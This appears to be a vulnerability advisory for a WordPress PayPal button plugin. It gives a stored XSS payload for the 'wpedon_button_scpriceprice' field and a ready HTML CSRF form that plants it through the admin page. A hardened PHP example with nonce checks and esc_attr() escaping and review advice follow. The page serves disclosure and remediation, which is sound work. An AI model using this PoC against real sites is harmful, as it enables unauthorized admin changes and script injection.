## https://sploitus.com/exploit?id=WPEX-ID:5C73754C-EEBE-424A-9D3B-CA83EB53BF87
Create/Edit a Button and put the following payload in the Amount Menu Name field (`wpedon_button_scpriceprice` parameter): `" autofocus=autofocus onfocus=alert(/XSS/) e=`

Via CSRF:

```html
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=wpedon_buttons&action=new" method="POST">
      <input type="hidden" name="wpedon_button_name" value="Test" />
      <input type="hidden" name="wpedon_button_price" value="" />
      <input type="hidden" name="wpedon_button_scpriceprice" value='" autofocus=autofocus onfocus=alert(/XSS/) e=' />
      <input type="hidden" name="update" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

The name, price and id params are not required, but they are displayed on the buttons overview and can be used to attract the victim's attention to edit the Button.

The XSS will trigger when editing the affected Button.
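Two defects combine here: the save handler accepts a cross-site POST (no nonce check), and the edit form echoes the stored field into an HTML attribute without escaping. The following is an added example of how a WordPress plugin would close both, written for this page rather than taken from the plugin: the function names, the option name and the nonce action are assumptions, and only the field name `wpedon_button_scpriceprice` comes from the advisory above.

```php
<?php
// Added example, not the plugin's own code. Hardened save and render handlers
// for an admin form like the one in the PoC. Function names, the option name
// and the nonce action are assumptions; only wpedon_button_scpriceprice is
// taken from the advisory.

// Save handler. A cross-site form post (the CSRF page above) cannot carry a
// valid WordPress nonce, so check_admin_referer() stops the request here.
function example_wpedon_save_button() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    // Dies unless the _wpnonce field is present and valid for this action.
    check_admin_referer( 'example_wpedon_save_button', '_wpnonce' );

    $raw = isset( $_POST['wpedon_button_scpriceprice'] )
        ? wp_unslash( $_POST['wpedon_button_scpriceprice'] )
        : '';
    // sanitize_text_field() strips tags and control characters but leaves
    // quotes alone, so escaping is still required when the value is rendered.
    $clean = sanitize_text_field( $raw );

    update_option( 'example_wpedon_button_scpriceprice', $clean );
}

// Render handler. esc_attr() turns a stored value such as
//   " autofocus=autofocus onfocus=alert(/XSS/) e=
// into &quot; autofocus=... inside the attribute, so the browser sees one
// literal string instead of new attributes and an event handler.
function example_wpedon_render_button_form() {
    $value = get_option( 'example_wpedon_button_scpriceprice', '' );
    ?>
    <form method="post">
        <?php wp_nonce_field( 'example_wpedon_save_button', '_wpnonce' ); ?>
        <label for="wpedon_button_scpriceprice">Amount Menu Name</label>
        <input type="text"
               id="wpedon_button_scpriceprice"
               name="wpedon_button_scpriceprice"
               value="<?php echo esc_attr( $value ); ?>" />
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}
```

Both halves are needed: the nonce check alone still leaves a stored XSS reachable by any user allowed to edit buttons, and output escaping alone still lets a cross-site request change button settings. When reviewing a plugin for this class of bug, look for every `echo` of a stored option inside a `value="..."` attribute that is not wrapped in `esc_attr()`, and for every settings save path that lacks `check_admin_referer()` or `wp_verify_nonce()`.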